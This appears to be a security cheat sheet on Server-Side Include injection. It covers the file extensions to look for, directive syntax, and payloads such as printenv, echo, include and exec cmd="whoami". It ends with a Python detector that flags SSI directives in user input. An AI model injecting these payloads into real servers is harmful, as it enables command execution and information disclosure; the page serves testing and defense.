Detections

Typical file extensions include .shtml, .shtm, and .stm. If you get redirected to any of those, try testing with the payloads below.

SSI Directives

SSI utilizes directives to add dynamically generated content to a static HTML page. These directives consist of the following components:

  • name: the directive’s name
  • parameter name: one or more parameters
  • value: one or more parameter values

An SSI directive has the following syntax:

<!--#name param1="value1" param2="value2" -->

Exploits

printenv prints environment variables. It does not take any parameters.

<!--#printenv -->

config changes the SSI configuration by specifying corresponding parameters. For instance, it can be used to change the error message using the errmsg parameter:

<!--#config errmsg="Error!" -->

echo prints the value of any variable given in the var parameter. Multiple variables can be printed by specifying multiple var parameters. For instance, the following variables are supported:

  • DOCUMENT_NAME: the current file’s name
  • DOCUMENT_URI: the current file’s URI
  • LAST_MODIFIED: timestamp of the last modification of the current file
  • DATE_LOCAL: local server time

<!--#echo var="DOCUMENT_NAME" var="DATE_LOCAL" -->

exec executes the command given in the cmd parameter:

<!--#exec cmd="whoami" -->

include includes the file specified in the virtual parameter. It only allows for the inclusion of files in the web root directory.

<!--#include virtual="index.html" -->
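
On the defensive side, the directive syntax above can be used to flag SSI directives in user-supplied input before it reaches a page the server parses for SSI. The following is an added example, not part of the original page; the function names, the severity ranking, and the sample inputs are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Directive syntax from the page: <!--#name param1="value1" param2="value2" -->
DIRECTIVE_RE = re.compile(r"<!--#(\w+)(.*?)-->", re.S)
PARAM_RE = re.compile(r"(\w+)\s*=\s*([\"'`])(.*?)\2", re.S)

# Directives named on the page; the severity ranking is an assumption.
SEVERITY = {
    "exec": "critical",   # runs a command on the server
    "include": "high",    # pulls another file into the response
    "printenv": "high",   # discloses environment variables
    "config": "medium",   # alters SSI behaviour such as errmsg
    "echo": "medium",     # discloses individual variables
}

def decode_layers(raw, max_rounds=2):
    """URL-decode repeatedly so single- and double-encoded input is covered."""
    for _ in range(max_rounds):
        decoded = unquote_plus(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw

def find_ssi_directives(raw):
    """Return (name, params, severity) for every SSI directive found in raw."""
    findings = []
    for match in DIRECTIVE_RE.finditer(decode_layers(raw)):
        name = match.group(1).lower()
        params = [(k.lower(), v) for k, _, v in PARAM_RE.findall(match.group(2))]
        findings.append((name, params, SEVERITY.get(name, "unknown")))
    return findings

# Constructed sample inputs (form fields / query strings), not real traffic.
SAMPLES = [
    "name=alice",
    "name=%3C!--%23exec+cmd%3D%22whoami%22+--%3E",
    'comment=<!--#echo var="DOCUMENT_NAME" var="DATE_LOCAL" -->',
    "q=%253C!--%2523printenv%2520--%253E",  # double URL-encoded
]

if __name__ == "__main__":
    for sample in SAMPLES:
        for name, params, severity in find_ssi_directives(sample):
            print(f"[{severity}] {name} {params} <- {sample}")
```

Rejecting or HTML-encoding any input that produces a finding is the safer response, since the regular expression is a detection aid and not a complete SSI parser.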